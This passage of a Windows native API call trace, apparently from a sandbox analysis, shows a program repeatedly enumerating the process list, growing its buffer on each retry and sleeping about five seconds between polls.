Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.395] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.411] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.426] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.442] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.459] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.473] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.489] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.504] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.520] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.537] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.559] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.574] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.582] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.599] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.613] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.629] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.644] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.663] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.676] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.691] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.708] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.723] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.734] 